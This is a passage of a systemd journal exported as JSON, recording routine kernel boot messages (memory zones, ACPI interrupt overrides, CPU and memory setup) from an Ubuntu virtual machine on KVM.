"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 21 pages reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=51;b=e2b08827b5804427b422c10c84f1567e;m=55848f;t=5bd16dd1903f7;x=cd8cce657b17ab84", "__REALTIME_TIMESTAMP" : "1615280779887607", "__MONOTONIC_TIMESTAMP" : "5604495", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 3998 pages, LIFO batch:0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=52;b=e2b08827b5804427b422c10c84f1567e;m=558499;t=5bd16dd190401;x=9e81a5d794812128", "__REALTIME_TIMESTAMP" : "1615280779887617", "__MONOTONIC_TIMESTAMP" : "5604505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA32 zone: 8128 pages used for memmap" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=53;b=e2b08827b5804427b422c10c84f1567e;m=5584a3;t=5bd16dd19040b;x=1bfa40fc3d32423e", "__REALTIME_TIMESTAMP" : "1615280779887627", "__MONOTONIC_TIMESTAMP" : "5604515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA32 zone: 520156 pages, LIFO batch:31" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=54;b=e2b08827b5804427b422c10c84f1567e;m=5584ad;t=5bd16dd190415;x=28af2f6ab1436462", "__REALTIME_TIMESTAMP" : "1615280779887637", "__MONOTONIC_TIMESTAMP" : "5604525", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: PM-Timer IO Port: 0x608" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=55;b=e2b08827b5804427b422c10c84f1567e;m=5584b7;t=5bd16dd19041e;x=edf10699cb629bdf", "__REALTIME_TIMESTAMP" : "1615280779887646", "__MONOTONIC_TIMESTAMP" : "5604535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: Local APIC address 0xfee00000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=56;b=e2b08827b5804427b422c10c84f1567e;m=5584c1;t=5bd16dd190428;x=69ccfa8beb9c4d88", "__REALTIME_TIMESTAMP" : "1615280779887656", "__MONOTONIC_TIMESTAMP" : "5604545", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: LAPIC_NMI (acpi_id[0xff] dfl dfl lint[0x1])" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=57;b=e2b08827b5804427b422c10c84f1567e;m=5584cb;t=5bd16dd190432;x=f0a4d98fcffa2fec", "__REALTIME_TIMESTAMP" : "1615280779887666", "__MONOTONIC_TIMESTAMP" : "5604555", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "IOAPIC[0]: apic_id 0, version 17, address 0xfec00000, GSI 0-23" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=58;b=e2b08827b5804427b422c10c84f1567e;m=5584d5;t=5bd16dd19043d;x=9e51ba997007efbf", "__REALTIME_TIMESTAMP" : "1615280779887677", "__MONOTONIC_TIMESTAMP" : "5604565", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=59;b=e2b08827b5804427b422c10c84f1567e;m=5584df;t=5bd16dd190446;x=5903629783fb36b7", "__REALTIME_TIMESTAMP" : "1615280779887686", "__MONOTONIC_TIMESTAMP" : "5604575", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5a;b=e2b08827b5804427b422c10c84f1567e;m=5584e9;t=5bd16dd190450;x=7df2e11a07cddc34", "__REALTIME_TIMESTAMP" : "1615280779887696", "__MONOTONIC_TIMESTAMP" : "5604585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5b;b=e2b08827b5804427b422c10c84f1567e;m=558514;t=5bd16dd19047b;x=443a95b1a9048bb8", "__REALTIME_TIMESTAMP" : "1615280779887739", "__MONOTONIC_TIMESTAMP" : "5604628", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", 
"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5c;b=e2b08827b5804427b422c10c84f1567e;m=558520;t=5bd16dd190488;x=7c23e11ae8bb2c84", "__REALTIME_TIMESTAMP" : "1615280779887752", "__MONOTONIC_TIMESTAMP" : "5604640", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5d;b=e2b08827b5804427b422c10c84f1567e;m=55852a;t=5bd16dd190491;x=8b2a8fb05353fa39", "__REALTIME_TIMESTAMP" : "1615280779887761", "__MONOTONIC_TIMESTAMP" : "5604650", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ0 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5e;b=e2b08827b5804427b422c10c84f1567e;m=558533;t=5bd16dd19049a;x=6649cd755b60f860", "__REALTIME_TIMESTAMP" : "1615280779887770", "__MONOTONIC_TIMESTAMP" : "5604659", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ5 used by override." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5f;b=e2b08827b5804427b422c10c84f1567e;m=55853c;t=5bd16dd1904a3;x=d9afb5e94a1ac23d", "__REALTIME_TIMESTAMP" : "1615280779887779", "__MONOTONIC_TIMESTAMP" : "5604668", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ9 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=60;b=e2b08827b5804427b422c10c84f1567e;m=558548;t=5bd16dd1904af;x=fc6da1e0ce4bb742", "__REALTIME_TIMESTAMP" : "1615280779887791", "__MONOTONIC_TIMESTAMP" : "5604680", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ10 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=61;b=e2b08827b5804427b422c10c84f1567e;m=558551;t=5bd16dd1904b8;x=bcf5412d0124a136", "__REALTIME_TIMESTAMP" : "1615280779887800", "__MONOTONIC_TIMESTAMP" : "5604689", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ11 used by override." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=62;b=e2b08827b5804427b422c10c84f1567e;m=55855a;t=5bd16dd1904c2;x=8336b9dc8a77e4ad", "__REALTIME_TIMESTAMP" : "1615280779887810", "__MONOTONIC_TIMESTAMP" : "5604698", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Using ACPI (MADT) for SMP configuration information" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=63;b=e2b08827b5804427b422c10c84f1567e;m=558574;t=5bd16dd1904db;x=7cb65efd0c394cd8", "__REALTIME_TIMESTAMP" : "1615280779887835", "__MONOTONIC_TIMESTAMP" : "5604724", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "smpboot: Allowing 1 CPUs, 0 hotplug CPUs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=64;b=e2b08827b5804427b422c10c84f1567e;m=55857e;t=5bd16dd1904e5;x=d33aaab4a9483d0", "__REALTIME_TIMESTAMP" : "1615280779887845", "__MONOTONIC_TIMESTAMP" : "5604734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x00000000-0x00000fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=65;b=e2b08827b5804427b422c10c84f1567e;m=558588;t=5bd16dd1904ef;x=fe55dbea91cdda3b", "__REALTIME_TIMESTAMP" : "1615280779887855", "__MONOTONIC_TIMESTAMP" : "5604744", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=66;b=e2b08827b5804427b422c10c84f1567e;m=558591;t=5bd16dd1904f9;x=10e4fdbaa37c6f61", "__REALTIME_TIMESTAMP" : "1615280779887865", "__MONOTONIC_TIMESTAMP" : "5604753", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x000a0000-0x000effff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=67;b=e2b08827b5804427b422c10c84f1567e;m=5585af;t=5bd16dd190516;x=40e1de179b1f3444", "__REALTIME_TIMESTAMP" : "1615280779887894", "__MONOTONIC_TIMESTAMP" : "5604783", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x000f0000-0x000fffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=68;b=e2b08827b5804427b422c10c84f1567e;m=5585c4;t=5bd16dd19052b;x=33b528785d423367", "__REALTIME_TIMESTAMP" : "1615280779887915", "__MONOTONIC_TIMESTAMP" : "5604804", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: [mem 0x80000000-0xfeffbfff] available for PCI devices" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=69;b=e2b08827b5804427b422c10c84f1567e;m=5585db;t=5bd16dd190542;x=29dab73ca5d325d1", "__REALTIME_TIMESTAMP" : "1615280779887938", "__MONOTONIC_TIMESTAMP" : "5604827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Booting paravirtualized kernel on KVM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6a;b=e2b08827b5804427b422c10c84f1567e;m=5585e4;t=5bd16dd19054c;x=a6da58fbae596331", "__REALTIME_TIMESTAMP" : "1615280779887948", "__MONOTONIC_TIMESTAMP" : "5604836", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6b;b=e2b08827b5804427b422c10c84f1567e;m=5585ed;t=5bd16dd190555;x=c98a8259479b7ba3", "__REALTIME_TIMESTAMP" : "1615280779887957", "__MONOTONIC_TIMESTAMP" : "5604845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: get_random_bytes called from start_kernel+0x99/0x4fd with crng_init=0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6c;b=e2b08827b5804427b422c10c84f1567e;m=5585f7;t=5bd16dd19055e;x=257d9b7f616e4ee1", "__REALTIME_TIMESTAMP" : "1615280779887966", "__MONOTONIC_TIMESTAMP" : "5604855", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : 
"0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "setup_percpu: NR_CPUS:8192 nr_cpumask_bits:1 nr_cpu_ids:1 nr_node_ids:1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6d;b=e2b08827b5804427b422c10c84f1567e;m=558600;t=5bd16dd190567;x=ee52472a4f3cd07c", "__REALTIME_TIMESTAMP" : "1615280779887975", "__MONOTONIC_TIMESTAMP" : "5604864", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "percpu: Embedded 46 pages/cpu s151552 r8192 d28672 u2097152" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6e;b=e2b08827b5804427b422c10c84f1567e;m=55860c;t=5bd16dd190574;x=1636d8827d3d709f", "__REALTIME_TIMESTAMP" : "1615280779887988", "__MONOTONIC_TIMESTAMP" : "5604876", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "pcpu-alloc: s151552 r8192 d28672 u2097152 alloc=1*2097152" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6f;b=e2b08827b5804427b422c10c84f1567e;m=558616;t=5bd16dd19057e;x=ff4d9ed204ab9f76", "__REALTIME_TIMESTAMP" : "1615280779887998", "__MONOTONIC_TIMESTAMP" : "5604886", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "pcpu-alloc: [0] 0 " } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=70;b=e2b08827b5804427b422c10c84f1567e;m=55861f;t=5bd16dd190587;x=4af90f064f9bfc08", "__REALTIME_TIMESTAMP" : "1615280779888007", "__MONOTONIC_TIMESTAMP" : "5604895", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "KVM setup async PF for cpu 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=71;b=e2b08827b5804427b422c10c84f1567e;m=558628;t=5bd16dd190590;x=62d11143cd575a88", "__REALTIME_TIMESTAMP" : "1615280779888016", "__MONOTONIC_TIMESTAMP" : "5604904", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-stealtime: cpu 0, msr 7fc24040" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=72;b=e2b08827b5804427b422c10c84f1567e;m=558631;t=5bd16dd190599;x=1cc3c8a9c9dd7901", "__REALTIME_TIMESTAMP" : "1615280779888025", "__MONOTONIC_TIMESTAMP" : "5604913", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Built 1 zonelists, mobility grouping on. 
Total pages: 515941" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=73;b=e2b08827b5804427b422c10c84f1567e;m=55863a;t=5bd16dd1905a1;x=e8caf151eb66e06b", "__REALTIME_TIMESTAMP" : "1615280779888033", "__MONOTONIC_TIMESTAMP" : "5604922", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Policy zone: DMA32" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=74;b=e2b08827b5804427b422c10c84f1567e;m=558646;t=5bd16dd1905ae;x=b008d01b5689d4df", "__REALTIME_TIMESTAMP" : "1615280779888046", "__MONOTONIC_TIMESTAMP" : "5604934", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-60-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=75;b=e2b08827b5804427b422c10c84f1567e;m=558653;t=5bd16dd1905ba;x=258fad1740261764", "__REALTIME_TIMESTAMP" : "1615280779888058", "__MONOTONIC_TIMESTAMP" : "5604947", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "Calgary: detecting Calgary via BIOS EBDA area" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=76;b=e2b08827b5804427b422c10c84f1567e;m=55865c;t=5bd16dd1905c3;x=7d6fd6818753d72d", "__REALTIME_TIMESTAMP" : "1615280779888067", "__MONOTONIC_TIMESTAMP" : "5604956", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : 
"0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "Calgary: Unable to locate Rio Grande table in EBDA - bailing!" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=77;b=e2b08827b5804427b422c10c84f1567e;m=55866d;t=5bd16dd1905d4;x=5a5325e226ebce28", "__REALTIME_TIMESTAMP" : "1615280779888084", "__MONOTONIC_TIMESTAMP" : "5604973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Memory: 2015744K/2096616K available (12300K kernel code, 2481K rwdata, 4172K rodata, 2436K init, 2384K bss, 80872K reserved, 0K cma-reserved)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=78;b=e2b08827b5804427b422c10c84f1567e;m=558679;t=5bd16dd1905e0;x=dff864ad4aaca487", "__REALTIME_TIMESTAMP" : "1615280779888096", "__MONOTONIC_TIMESTAMP" : "5604985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1" } { "__CURSOR" : 